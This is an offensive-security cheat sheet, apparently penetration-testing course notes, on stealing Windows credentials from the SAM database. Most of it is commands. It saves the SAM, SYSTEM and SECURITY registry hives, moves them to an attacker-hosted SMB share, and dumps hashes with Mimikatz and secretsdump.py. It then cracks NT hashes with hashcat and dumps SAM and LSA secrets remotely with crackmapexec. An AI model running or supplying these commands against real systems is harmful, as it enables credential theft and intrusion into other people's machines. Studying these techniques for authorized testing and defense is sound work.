# Attacking SAM ### **Copying SAM Registry Hives** There are three registry hives that we can copy if we have local admin access on the target; each will have a specific purpose when we get to dumping and cracking the hashes. Here is a brief description of each in the table below: | Registry Hive | Description | | ------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | | hklm\sam | Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext. | | hklm\system | Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database. | | hklm\security | Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target. | ### Dumping SAM with Mimikatz ``` lsadump::sam ``` ### **Using reg.exe save to Copy Registry Hives** ```bash reg.exe save hklm\\sam C:\\sam.save reg.exe save hklm\\system C:\\system.save reg.exe save hklm\\security C:\\security.save # Send the saved files to our system # start smbserver smbserver.py -smb2support share . # In Target Windows host move sam.save \\\\ip\\share move system.save \\\\ip\\share move security.save \\\\ip\\share ``` ### **Dumping Hashes with Impacket's secretsdump.py** ```bash # Dumping Hashes using transfered files secretsdump.py -sam sam.save -security security.save -system system.save LOCAL ``` ### **Cracking Hashes with Hashcat** ```bash # Store nthashes to a .txt File (uid:rid:lmhash:nthash) <-- last part is nthash # Cracking nt hashes using hashcat sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt ``` ### **Remote Dumping & LSA Secrets Considerations** ### **Dumping LSA Secrets Remotely** ```bash crackmapexec smb ip --local-auth -u eren -p pass --lsa ``` ### **Dumping SAM Remotely** ```bash crackmapexec smb ip --local-auth -u eren -p pass --sam ```